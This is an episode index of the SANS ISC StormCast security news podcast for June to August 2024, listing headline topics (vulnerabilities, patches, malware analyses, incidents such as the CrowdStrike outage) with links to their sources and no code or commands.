- QNAP QTS 5.2 Security Center (Active File Activity Monitoring Against Ransomware) https://www.qnap.com/en/news/2024/qnap-officially-releases-qts-5-2-introducing-security-center-for-active-file-activity-monitoring-elevated-security-and-data-protection
8/22/2024 (7 minutes, 5 seconds)

ISC StormCast for Wednesday, August 21st, 2024

- Where Are We with CVE-2024-38063: Microsoft IPv6 Vulnerability https://isc.sans.edu/diary/Where+are+we+with+CVE202438063+Microsoft+IPv6+Vulnerability/31186
- Microsoft August Update Prevents Linux from Booting (SBAT Verification Error) https://community.frame.work/t/sbat-verification-error-booting-linux-after-windows-update/56354
- PHP CGI Vulnerability (CVE-2024-4577) Exploited https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns
- F5 Updates https://my.f5.com/manage/s/article/K000140111 https://my.f5.com/manage/s/article/K000140108
8/21/2024 (4 minutes, 54 seconds)

ISC StormCast for Tuesday, August 20th, 2024

- Do You Like Donuts? Here Is a Donut Shellcode Delivered Through PowerShell/Python https://isc.sans.edu/diary/Do%20you%20Like%20Donuts%3F%20Here%20is%20a%20Donut%20Shellcode%20Delivered%20Through%20PowerShell%20Python/31182
- How Vulnerabilities in Microsoft Apps for macOS Allow Stealing Permissions https://blog.talosintelligence.com/how-multiple-vulnerabilities-in-microsoft-apps-for-macos-pave-the-way-to-stealing-permissions/
- Digital Wallet Security Loophole https://www.umass.edu/news/article/new-study-reveals-loophole-digital-wallet-security-even-if-rightful-cardholder-doesnt
- Microsoft IPv6 Vulnerability CVE-2024-38063 https://x.com/f4rmpoet/status/1825472703223992323
- YouTube Video (going live 10am ET) https://www.youtube.com/watch?v=miBb1llFOYQ
8/20/2024 (7 minutes, 12 seconds)

ISC StormCast for Monday, August 19th, 2024

- Summarizing Web Honeypot Logs [Guest Diary]: 7 Minutes and 4 Steps to a Quick Win https://isc.sans.edu/diary/%5BGuest%20Diary%5D%207%20minutes%20and%204%20steps%20to%20a%20quick%20win%3A%20A%20write-up%20on%20custom%20tools/31170
- Large-Scale Cloud Extortion Operation https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
- Chrome Redacting Credit Cards and Passwords When You Share Android Screens https://www.bleepingcomputer.com/news/google/chrome-will-redact-credit-cards-passwords-when-you-share-android-screen/
- Google Products Targeted by Search Ad Scammers https://www.malwarebytes.com/blog/scams/2024/08/dozens-of-google-products-targeted-by-scammers-via-malicious-search-ads
- MakeShift: Security Analysis of Shimano Di2 Wireless Gear Shifting in Bicycles https://www.usenix.org/system/files/woot24-motallebighomi.pdf
8/19/2024 (6 minutes, 6 seconds)

ISC StormCast for Friday, August 16th, 2024

- Wireshark 4.4.0rc1's Custom Columns https://isc.sans.edu/diary/Wireshark%204.4.0rc1%27s%20Custom%20Columns/31174
- GitHub Repo Artifacts Leak Tokens https://unit42.paloaltonetworks.com/github-repo-artifacts-leak-tokens/
- BitLocker Security Feature Bypass Vulnerability (CVE-2024-38058) https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38058
- SolarWinds Web Help Desk 12.8.3 Hotfix 1 https://support.solarwinds.com/SuccessCenter/s/article/WHD-12-8-3-Hotfix-1
- Ed Skoudis, Paul Maurer: The Code of Honor https://cybercodeofhonor.com/
8/16/2024 (17 minutes, 23 seconds)

ISC StormCast for Thursday, August 15th, 2024

- Multiple Malware Dropped Through MSI Package https://isc.sans.edu/diary/Multiple%20Malware%20Dropped%20Through%20MSI%20Package/31168
- Microsoft IPv6 Vulnerability CVE-2024-38063 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 https://x.com/XiaoWei___/status/1823532146679799993/photo/1
- Critical Ivanti Virtual Traffic Manager (vTM) Patch CVE-2024-7593 https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US
- Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
8/15/2024 (6 minutes, 41 seconds)

ISC StormCast for Wednesday, August 14th, 2024

- Microsoft August 2024 Patch Tuesday https://isc.sans.edu/diary/Microsoft%20August%202024%20Patch%20Tuesday/31164
- NIST Finalizes Post-Quantum Encryption Standards https://www.nist.gov/news-events/news/2024/08/nist-releases-first-3-finalized-post-quantum-encryption-standards
- Zabbix Network Monitoring Updates https://support.zabbix.com/browse/ZBX-25016 https://support.zabbix.com/browse/ZBX-25013 (and others)
8/14/2024 (6 minutes, 11 seconds)

ISC StormCast for Tuesday, August 13th, 2024

- QuickShell: Sharing Is Caring about an RCE Attack Chain on Quick Share https://www.safebreach.com/blog/rce-attack-chain-on-quick-share
- Chrome, Edge Users Beset by Malicious Extensions That Can't Be Easily Removed https://www.helpnetsecurity.com/2024/08/12/chrome-edge-malicious-browser-extensions/
- AMD Guest Memory Vulnerabilities https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7014.html
8/13/2024 (5 minutes, 31 seconds)

ISC StormCast for Monday, August 12th, 2024

- Video: Same Origin, CORS, DNS Rebinding and Localhost https://isc.sans.edu/forums/diary/Video%3A%20Same%20Origin%2C%20CORS%2C%20DNS%20Rebinding%20and%20Localhost/31158/
- Splitting the Email Atom: Exploiting Parsers to Bypass Access Controls https://portswigger.net/research/splitting-the-email-atom#parser-discrepancies
- Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server! https://blog.orange.tw/2024/08/confusion-attacks-en.html
- GL.iNet Patches https://www.gl-inet.com/security-updates/security-advisories-vulnerabilities-and-cves-aug-1-2024/
- Microsoft Office Spoofing Vulnerability (CVE-2024-38200) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38200
8/12/2024 (5 minutes, 51 seconds)

ISC StormCast for Friday, August 9th, 2024

- Exploring Anti-Phishing Measures in Microsoft 365 https://certitude.consulting/blog/en/o365-anti-phishing-measures/
- SSHamble Security Testing Tool https://www.runzero.com/blog/sshamble-unexpected-exposures-in-the-secure-shell/
- macOS Sequoia Weekly Permission Prompts https://9to5mac.com/2024/08/06/macos-sequoia-screen-recording-privacy-prompt/
- .internal Top-Level Domain for Private Use https://www.icann.org/en/public-comment/proceeding/proposed-top-level-domain-string-for-private-use-24-01-2024
8/9/2024 (6 minutes, 17 seconds)

ISC StormCast for Thursday, August 8th, 2024

- 0.0.0.0 Day: Exploiting Localhost APIs from the Browser https://www.oligo.security/blog/0-0-0-0-day-exploiting-localhost-apis-from-the-browser
- Apple Hardens Gatekeeper https://developer.apple.com/news/?id=saqachfa
- Downgrade Attacks Using Windows Updates https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/
8/8/2024 (6 minutes, 20 seconds)

ISC StormCast for Wednesday, August 7th, 2024

- A Survey of Scans for GeoServer Vulnerabilities https://isc.sans.edu/diary/A%20Survey%20of%20Scans%20for%20GeoServer%20Vulnerabilities/31148
- CrowdStrike Root Cause Analysis https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/
- Kibana Vulnerability (ESA-2024-22) https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424
- Android August 2024 Bulletin https://source.android.com/docs/security/bulletin/2024-08-01
- Ubiquiti Amplification Attack Vulnerability Update https://blog.checkpoint.com/research/over-20000-ubiquiti-cameras-and-routers-are-vulnerable-to-amplification-attacks-and-privacy-risks/
8/7/2024 (5 minutes, 58 seconds)

ISC StormCast for Tuesday, August 6th, 2024

- Script Obfuscation Using Multiple Instances of the Same Function https://isc.sans.edu/diary/Script%20obfuscation%20using%20multiple%20instances%20of%20the%20same%20function/31144
- Disclosure of Key Technical Details of CrowdStrike's Large-Scale Blue Screen https://mp.weixin.qq.com/s/uD7mhzyRSX1dTW-TMg4UhQ
- New OFBiz Vulnerability (OFBIZ-13128) https://issues.apache.org/jira/browse/OFBIZ-13128 https://www.youtube.com/watch?v=J_IxCBjd4Pw
- Roundcube XSS Vulnerabilities https://securityonline.info/roundcube-webmail-releases-security-updates-to-patch-multiple-vulnerabilities/
8/6/2024 (6 minutes, 21 seconds)

ISC StormCast for Monday, August 5th, 2024

- Current Secure Boot Certificate Authority Expires in 2026 https://isc.sans.edu/diary/Even+Linux+users+should+take+a+look+at+this+Microsoft+KB+article/31140
- OOXML Spreadsheets Protected by Verifier Hashes https://isc.sans.edu/diary/OOXML%20Spreadsheets%20Protected%20By%20Verifier%20Hashes/31072
- StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/
- DARPA TRACTOR Program for Translating C to Rust https://www.darpa.mil/news-events/2024-07-31a
8/5/2024 (6 minutes, 21 seconds)

ISC StormCast for Friday, August 2nd, 2024

- Tracking Proxy Scans with IPv4.Games
  https://isc.sans.edu/diary/Tracking%20Proxy%20Scans%20with%20IPv4.Games/31136
- Threat Actor Impersonates Google via Fake Ad For Authenticator
  https://www.malwarebytes.com/blog/news/2024/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator
- Who Knew? Domain Hijacking is so easy
  https://blogs.infoblox.com/threat-intelligence/who-knew-domain-hijacking-is-so-easy/
8/2/2024, 6 minutes, 13 seconds

ISC StormCast for Thursday, August 1st, 2024

- Increased Activity Against Apache OFBiz CVE-2024-32113
  https://isc.sans.edu/diary/Increased%20Activity%20Against%20Apache%20OFBiz%20CVE-2024-32113/31132
- Digicert Certificate Revocation Incident
  https://www.digicert.com/support/certificate-revocation-incident
- Microsoft Azure Outage
  https://azure.status.microsoft/en-us/status/history/
- Improving Security of Chrome Cookies
  https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html
8/1/2024, 6 minutes, 33 seconds

ISC StormCast for Wednesday, July 31st, 2024

- Apple Updates Everything: July 2024 Edition
  https://isc.sans.edu/diary/Apple%20Patches%20Everything.%20July%202024%20Edition/31128
- VMWare ESXi Vulnerability Actively Exploited CVE-2024-37085
  https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/
- Weak VoWiFi Encryption CVE-2024-22064
  https://idw-online.de/en/news837652
7/31/2024, 5 minutes, 27 seconds

ISC StormCast for Tuesday, July 30th, 2024

- CrowdStrike Outage Themed Maldoc
  https://isc.sans.edu/diary/CrowdStrike%20Outage%20Themed%20Maldoc/31116
- HotJar XSS Puts OAuth at Risk
  https://salt.security/blog/over-1-million-websites-are-at-risk-of-sensitive-information-leakage---xss-is-dead-long-live-xss
- Proofpoint Echospoofing
  https://labs.guard.io/echospoofing-a-massive-phishing-campaign-exploiting-proofpoints-email-protection-to-dispatch-3dd6b5417db6
7/30/2024, 5 minutes, 46 seconds

ISC StormCast for Monday, July 29th, 2024

- ExelaStealer Delivered "From Russia With Love"
  https://isc.sans.edu/diary/31118
- Create Your Own BSOD: NotMyFault
  https://isc.sans.edu/diary/Create%20Your%20Own%20BSOD%3A%20NotMyFault/31120
- PKFail Vulnerability
  https://pk.fail/
- CrowdStrike Recovery
  https://arstechnica.com/information-technology/2024/07/97-of-crowdstrike-systems-are-back-online-microsoft-suggests-windows-changes/
7/29/2024, 6 minutes, 3 seconds

ISC StormCast for Friday, July 26th, 2024

- X-Worm Hidden With Process Hollowing
  https://isc.sans.edu/diary/XWorm%20Hidden%20With%20Process%20Hollowing/31112
- Anyone Can Access Deleted and Private Repo Data on GitHub
  https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github
- Google Chrome Scanning Encrypted Files
  https://arstechnica.com/security/2024/07/google-overhauls-chromes-safe-browsing-protection-to-scan-password-protected-files/
7/26/2024, 5 minutes, 54 seconds

ISC StormCast for Thursday, July 25th, 2024

- "Mouse Logger" Malicious Python Script
  https://isc.sans.edu/diary/%22Mouse%20Logger%22%20Malicious%20Python%20Script/31106
- Crowdstrike Preliminary Post Incident Review
  https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/
- How a North Korean Fake IT Worker Tried to Infiltrate Us
  https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us
7/25/2024, 5 minutes, 32 seconds

ISC StormCast for Wednesday, July 24th, 2024

- New Exploit Variation Against D-Link NAS Devices
  https://isc.sans.edu/diary/New%20Exploit%20Variation%20Against%20D-Link%20NAS%20Devices%20%28CVE-2024-3273%29/31102
- APKs Masquerading as Videos on Telegram
  https://www.welivesecurity.com/en/eset-research/cursed-tapes-exploiting-evilvideo-vulnerability-telegram-android/
- Goodbye Attackers can Bypass Windows Hello Strong Authentication
  https://www.darkreading.com/endpoint-security/goodbye-attackers-can-bypass-windows-hello-strong-authentication
- Let's Encrypt Intends to End OCSP Service
  https://letsencrypt.org/2024/07/23/replacing-ocsp-with-crls.html
- Google Third-Party Cookies are hanging around
  https://privacysandbox.com/intl/en_us/news/privacy-sandbox-update/
7/24/2024, 6 minutes, 23 seconds

ISC StormCast for Tuesday, July 23rd, 2024

- CrowdStrike Update
  https://isc.sans.edu/diary/CrowdStrike%3A%20The%20Monday%20After/31098
  https://www.theregister.com/2024/07/21/crowdstrike_linux_crashes_restoration_tools/
- Keynote Recording
  https://www.sans.org/services/video-player/?key=1goL2vPrltnj
  https://www.sans.org/webcasts/sansfire-2024-keynote-25-years-of-the-internet-storm-center-time-traveling-through-sensor-data/
7/23/2024, 5 minutes, 14 seconds

ISC StormCast for Monday, July 22nd, 2024

- Widespread Windows Crashes Due to Crowdstrike Updates
  https://isc.sans.edu/diary/Widespread%20Windows%20Crashes%20Due%20to%20Crowdstrike%20Updates/31094
  https://www.crowdstrike.com/falcon-content-update-remediation-and-guidance-hub/
  https://www.crowdstrike.com/blog/falcon-update-for-windows-hosts-technical-details/
  https://techcommunity.microsoft.com/t5/intune-customer-success/new-recovery-tool-to-help-with-crowdstrike-issue-impacting/ba-p/4196959
7/22/2024, 8 minutes, 38 seconds

ISC StormCast for Friday, July 19th, 2024

- Oracle Quarterly Critical Patch Update
  https://www.oracle.com/security-alerts/cpujul2024.html
- Exchange Online Implementing Inbound SMTP DANE with DNSSEC
  https://techcommunity.microsoft.com/t5/exchange-team-blog/announcing-public-preview-of-inbound-smtp-dane-with-dnssec-for/ba-p/4155257
- VPN Port Shadowing Vulnerability
  https://petsymposium.org/popets/2024/popets-2024-0070.pdf
7/19/2024, 5 minutes, 38 seconds

ISC StormCast for Thursday, July 18th, 2024

- Who You Gonna Call: Androx Gh0st Busters!
  https://isc.sans.edu/diary/Who%20You%20Gonna%20Call%3F%20AndroxGh0st%20Busters!%20%5BGuest%20Diary%5D/31086
- Cisco Smart Software Manager Vulnerability CVE-2024-20419
  https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
- Critical Security Flaw in Cisco Secure Email Gateway: CVE-2024-20401
  https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-afw-bGG2UsjH
- Microsoft Introducing Checkpoint Updates
  https://techcommunity.microsoft.com/t5/windows-it-pro-blog/introducing-windows-11-checkpoint-cumulative-updates/ba-p/4182552
- GeoServer Patches
  https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
7/18/2024, 6 minutes, 4 seconds

ISC StormCast for Wednesday, July 17th, 2024

- Reply Chain Phishing With a Twist
  https://isc.sans.edu/diary/%22Reply-chain%20phishing%22%20with%20a%20twist/31084
- Claroty TP-Link and Synology IP Camera Exploits
  https://claroty.com/team82/research/pivoting-from-wan-to-lan-synology-bc500-ip-camera
  https://claroty.com/team82/research/pwn2own-wan-to-lan-exploit-showcase
- Cosmic Sting Hits Adobe Commerce Stores
  https://sansec.io/research/cosmicsting-hitting-major-stores
7/17/2024, 5 minutes, 39 seconds

ISC StormCast for Tuesday, July 16th, 2024

- Protected OOXML Spreadsheets
  https://isc.sans.edu/diary/Protected%20OOXML%20Spreadsheets/31070
- Leaked PyPi Secret Token Revealed in Binary
  https://jfrog.com/blog/leaked-pypi-secret-token-revealed-in-binary-preventing-suppy-chain-attack/
- Microsoft 365 Defender Affected by June Update
  https://learn.microsoft.com/en-us/windows/release-health/status-windows-server-2022#network-data-reporting-from-microsoft-365-defender-may-be-interrupted
7/16/2024, 5 minutes, 59 seconds

ISC StormCast for Monday, July 15th, 2024

- 16-Bit Hash Collisions in XLS Spreadsheets
  https://isc.sans.edu/diary/16-bit%20Hash%20Collisions%20in%20.xls%20Spreadsheets/31066
- Attacks against the "Nette" PHP framework CVE-2020-15227
  https://isc.sans.edu/forums/diary/Attacks+against+the+Nette+PHP+framework+CVE202015227/31076/
- Squarespace Hijacked Domains
  https://github.com/security-alliance/advisories/blob/main/2024-07-squarespace.pdf
7/15/2024, 6 minutes, 30 seconds

ISC StormCast for Friday, July 12th, 2024

- Understanding SSH Honeypot Logs: Attackers Fingerprinting Honeypots
  https://isc.sans.edu/diary/Understanding%20SSH%20Honeypot%20Logs%3A%20Attackers%20Fingerprinting%20Honeypots/31064
- Patch or Peril: A Veeam Vulnerability Incident
  https://www.group-ib.com/blog/estate-ransomware/
- Juniper Patches
  https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&f:ctype=[Security%20Advisories]
- VMWare Aria Automation SQL Injection Vulnerability
  https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24598
- Leaked SMS Messages
  https://www.ccc.de/de/updates/2024/2fa-sms
7/12/2024, 7 minutes, 30 seconds

ISC StormCast for Thursday, July 11th, 2024

- Finding Honeypot Data Clusters Using DBSCAN Part 1
  https://isc.sans.edu/diary/Finding%20Honeypot%20Data%20Clusters%20Using%20DBSCAN%3A%20Part%201/31050
- Second RegreSSHion Like OpenSSH Vulnerability
  https://lwn.net/ml/all/[email protected]/
- Resurrecting Internet Explorer: Threat Actors Using Zero-Day Tricks in Internet Shortcut File CVE-2024-38112
  https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/
- SharePoint Proof of Concept Exploit CVE-2024-38094 CVE-2024-38024 CVE-2024-38023
  https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC/blob/main/poc_filtered.py
- Citrix Netscaler, Agent and SDX Security Bulletin CVE-2024-6235 CVE-2024-6236
  https://support.citrix.com/article/CTX677998/netscaler-console-agent-and-sdx-security-bulletin-for-cve20246235-and-cve20246236
- OpenVPN Updates
  https://openvpn.net/security-advisory/ovpnx-vulnerability-cve-2024-27903-cve-2024-27459-cve-2024-24974/
7/11/2024, 5 minutes, 33 seconds

ISC StormCast for Wednesday, July 10th, 2024

- Microsoft Patch Tuesday July 2024
  https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20July%202024/31058
- Adobe Patches
  https://helpx.adobe.com/security/security-bulletin.html
- RADIUS protocol susceptible to forgery attacks
  https://kb.cert.org/vuls/id/456537
  https://www.inkbridgenetworks.com/blastradius/faq
7/10/2024, 6 minutes, 25 seconds

ISC StormCast for Tuesday, July 9th, 2024

- Kunai: Keep an Eye on your Linux Hosts Activity
  https://isc.sans.edu/diary/Kunai%3A%20Keep%20an%20Eye%20on%20your%20Linux%20Hosts%20Activity/31054
- Decryptor for DoNex Ransomware
  https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/
- Shelltorch Explained: Multiple Vulnerabilities in Pytorch Model Server (Torchserve)
  https://www.oligo.security/blog/shelltorch-explained-multiple-vulnerabilities-in-pytorch-model-server
- Exim Bypass Attachment Inspection
  https://bugs.exim.org/show_bug.cgi?id=3099#c4
- Toshiba/Sharp Printer vulnerabilities
  https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html
  https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html
7/9/2024, 5 minutes, 33 seconds

ISC StormCast for Monday, July 8th, 2024

- OpenSSH RegreSSHion Vulnerability
  https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
  https://isc.sans.edu/diary/SSH%20%22regreSSHion%22%20Remote%20Code%20Execution%20Vulnerability%20in%20OpenSSH./31046
- Overlooked Domain Name Resiliency Issues: Registrar Communications
  https://isc.sans.edu/diary/Overlooked%20Domain%20Name%20Resiliency%20Issues%3A%20Registrar%20Communications/31048
- Cloudflare 1.1.1.1 incident on June 27th 2024
  https://blog.cloudflare.com/cloudflare-1111-incident-on-june-27-2024
7/8/2024, 9 minutes, 26 seconds

ISC StormCast for Friday, June 28th, 2024

- What Setting Live Traps For Cybercriminals Taught Me About Security
  https://isc.sans.edu/diary/What%20Setting%20Live%20Traps%20for%20Cybercriminals%20Taught%20Me%20About%20Security%20%5BGuest%20Diary%5D/31038
- TeamViewer Compromise
  https://www.teamviewer.com/en-us/resources/trust-center/statement/
- Fortra File Catalyst Vulnerability and PoC
  https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0
  https://www.tenable.com/security/research/tra-2024-25
- GitLab Critical Update
  https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
- When Prompts Go Rogue: Analyzing a Prompt Injection Code Execution in Vanna.AI
  https://jfrog.com/blog/prompt-injection-attack-code-execution-in-vanna-ai-cve-2024-5565/
6/28/2024, 7 minutes, 29 seconds

ISC StormCast for Thursday, June 27th, 2024

- Critical Progress MOVEit Authentication Bypass Vulnerability
  https://labs.watchtowr.com/auth-bypass-in-un-limited-scenarios-progress-moveit-transfer-cve-2024-5806/
  https://community.progress.com/s/article/MOVEit-Transfer-Product-Security-Alert-Bulletin-June-2024-CVE-2024-5806
- Polyfill.io Supply Chain Attack
  https://cside.dev/blog/more-than-100k-websites-targeted-in-web-supply-chain-attack
- Apple AirPods Firmware Update
  https://support.apple.com/en-us/HT214111
6/27/2024, 6 minutes, 22 seconds

ISC StormCast for Wednesday, June 26th, 2024

- TCP Latency Sidechannel
  https://www.snailload.com/snailload.pdf
- Microsoft Management Console for Initial Access and Evasion
  https://www.elastic.co/security-labs/grimresource
- Wyze Camera Vulnerabilities
  https://forums.wyze.com/t/security-advisory/289256
6/26/2024, 6 minutes, 23 seconds

ISC StormCast for Tuesday, June 25th, 2024

- Configuration Scans Expand
  https://isc.sans.edu/diary/Configuration%20Scanners%20Adding%20Java%20Specific%20Configuration%20Files/31032
- SQL Server Emergency Fix
  https://support.microsoft.com/en-us/topic/june-20-2024-kb5041054-os-build-20348-2529-out-of-band-b746ffbd-934e-42ac-9c66-ed0636edf7f1
- Juniper Security Analytics Update
  https://supportportal.juniper.net/s/article/On-Demand-JSA-Series-Multiple-vulnerabilities-resolved-in-Juniper-Secure-Analytics-in-7-5-0-UP8-IF03?language=en_US
- MacOS/iOS XNU Buffer Overflow Exploit CVE-2024-27815
  https://jprx.io/cve-2024-27815/
6/25/2024, 5 minutes, 25 seconds

ISC StormCast for Monday, June 24th, 2024

- Sysinternals Process Monitor Version 4 Released
  https://isc.sans.edu/diary/Sysinternals%27%20Process%20Monitor%20Version%204%20Released/31026
- Kaspersky Sanctions
  https://home.treasury.gov/news/press-releases/jy2420
- Phoenix UEFI Buffer Overflow Affects Wide Range of Systems
  https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware/
- Ghostscript Update
  https://ghostscript.readthedocs.io/en/gs10.03.1/News.html
- js2py vulnerability
  https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape
6/24/2024, 7 minutes, 6 seconds

ISC StormCast for Friday, June 21st, 2024

- No Excuses: Free Tools to Help Secure Authentication in Ubuntu
  https://isc.sans.edu/diary/No%20Excuses%2C%20Free%20Tools%20to%20Help%20Secure%20Authentication%20in%20Ubuntu%20Linux%20%5BGuest%20Diary%5D/31024
- Handling BOM MIME Files
  https://isc.sans.edu/diary/Handling+BOM+MIME+Files/31022
- Atlassian Confluence Data Center and Server Vulnerability
  https://confluence.atlassian.com/security/security-bulletin-june-18-2024-1409286211.html
- Beyond the @ Symbol: Exploiting the Flexibility of Email Addresses For Offensive Purposes
  https://modzero.com/en/blog/beyond_the_at_symbol/
- VMWare Patches
  https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453
6/21/2024, 5 minutes, 9 seconds

ISC StormCast for Tuesday, June 18th, 2024

- New NetSupport Campaign Delivered Through MSIX Packages
  https://isc.sans.edu/diary/New%20NetSupport%20Campaign%20Delivered%20Through%20MSIX%20Packages/31018
- D-Link Router Backdoor
  https://www.twcert.org.tw/en/cp-139-7880-629f5-2.html
  https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10398
- iTerm2 Vulnerability
  https://vin01.github.io/piptagole/escape-sequences/iterm2/rce/2024/06/16/iterm2-rce-window-title-tmux-integration.html
- NextCloud Vulnerability
  https://github.com/nextcloud/security-advisories/security/advisories/GHSA-9v72-9xv5-3p7c
6/18/2024, 4 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, June 17th, 2024

Overview of My Tools That Handle JSON Data https://isc.sans.edu/diary/Overview%20of%20My%20Tools%20That%20Handle%20JSON%20Data/31012
Python Serialization and "Sleepy Pickle" https://x.com/MarkBaggett/status/1801732554740969561
Detecting Headless Chrome https://deviceandbrowserinfo.com/learning_zone/articles/detecting-headless-chrome-puppeteer-2024
Detecting Malicious VS Code Extensions https://medium.com/@amitassaraf/4-6-introducing-extensiontotal-how-to-assess-risk-in-vs-code-extensions-3ac5bfd83fb1
ASUS Router Critical Vulnerability https://www.asus.com/content/asus-product-security-advisory/
6/17/2024 (5 minutes, 26 seconds)

ISC StormCast for Friday, June 14th, 2024

The Art of JQ and Command-Line Fu https://isc.sans.edu/diary/The%20Art%20of%20JQ%20and%20Command-line%20Fu%20%5BGuest%20Diary%5D/31006
Microsoft Outlook Vulnerability Details https://blog.morphisec.com/cve-2024-30103-microsoft-outlook-vulnerability
Keeping our Outlook Personal Email Users Safe https://techcommunity.microsoft.com/t5/outlook-blog/keeping-our-outlook-personal-email-users-safe-reinforcing-our/ba-p/4164184
Exploiting ML models with pickle file attacks https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/
6/14/2024 (5 minutes, 34 seconds)

ISC StormCast for Thursday, June 13th, 2024

MSMQ Packets https://isc.sans.edu/diary/Port%201801%20Traffic%3A%20Microsoft%20Message%20Queue/31004
Adobe Updates https://helpx.adobe.com/security/products/magento/apsb24-40.html
Black Basta Exploited CVE-2024-26169 Prior to Patch https://symantec-enterprise-blogs.security.com/threat-intelligence/black-basta-ransomware-zero-day
Pixel Phone 0-Day Patched https://source.android.com/docs/security/bulletin/pixel/2024-06-01
6/13/2024 (5 minutes, 20 seconds)

ISC StormCast for Wednesday, June 12th, 2024

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20June%202024/31000
JetBrains IntelliJ Based IDE GitHub Plugin Vulnerability https://blog.jetbrains.com/security/2024/06/updates-for-security-issue-affecting-intellij-based-ides-2023-1-and-github-plugin/
Veeam Recovery Orchestrator (VRO) vulnerability CVE-2024-29855 https://www.veeam.com/kb4585
Precor Treadmill Vulnerability https://securityintelligence.com/x-force/internet-connected-treadmill-vulnerabilities-discovered/
6/12/2024 (5 minutes, 39 seconds)

ISC StormCast for Tuesday, June 11th, 2024

Veeam Exploit CVE-2024-29849 https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
SORBS Shutdown https://www.theregister.com/2024/06/07/sorbs_closed/
Rogue Cell Tower Shut Down in London https://www.cityoflondon.police.uk/news/city-of-london/news/2024/june/two-people-arrested-in-connection-with-investigation-into-homemade-mobile-antenna-used-to-send-thousands-of-smishing-text-messages-to-the-public/
Malicious ComfyUI Modules https://www.youtube.com/watch?v=ntwGHjBCbeQ
6/11/2024 (6 minutes, 3 seconds)

ISC StormCast for Monday, June 10th, 2024

PHP Unicode Remote Code Execution Exploit https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/
PyTorch Distributed RPC Framework Remote Code Execution https://huntr.com/bounties/39811836-c5b3-4999-831e-46fee8fcade3 https://www.cve.org/CVERecord?id=CVE-2024-5480
Malicious VSCode Extensions Used by Researchers https://www.bleepingcomputer.com/news/security/malicious-visual-studio-code-extensions-with-millions-of-installs-discovered/
6/10/2024 (8 minutes, 10 seconds)

ISC StormCast for Friday, June 7th, 2024

Malicious Python Script with a "Best Before" Date https://isc.sans.edu/diary/Malicious%20Python%20Script%20with%20a%20%22Best%20Before%22%20Date/30988
FBI Obtained 7,000 LockBit Ransomware Keys https://www.fbi.gov/news/speeches/fbi-cyber-assistant-director-bryan-vorndran-s-remarks-at-the-2024-boston-conference-on-cyber-security
Apple Guarantees 5 Years of Security Updates https://www.androidauthority.com/iphone-software-support-commitment-3449135/
FCC Proposes New Rule for Routing Security https://www.fcc.gov/document/fcc-proposes-internet-routing-security-reporting-requirements
6/7/2024 (6 minutes, 11 seconds)

ISC StormCast for Thursday, June 6th, 2024

WatchGuard VPN Brute Forcing https://isc.sans.edu/diary/Brute%20Force%20Attacks%20Against%20Watchguard%20VPN%20Endpoints/30984
TotalRecall Tool To Extract Data from Microsoft Recall https://github.com/xaitax/TotalRecall
WebEx Flaw https://www.helpnetsecurity.com/2024/06/05/cisco-webex-cloud-vulnerability/ https://netzbegruenung.de/blog/netzbegruenung-findet-schwachstellen-auch-im-cisco-webex-clouddienst-behoerden-und-unternehmen-in-ganz-europa-betroffen/ (in German)
6/6/2024 (6 minutes, 28 seconds)

ISC StormCast for Wednesday, June 5th, 2024

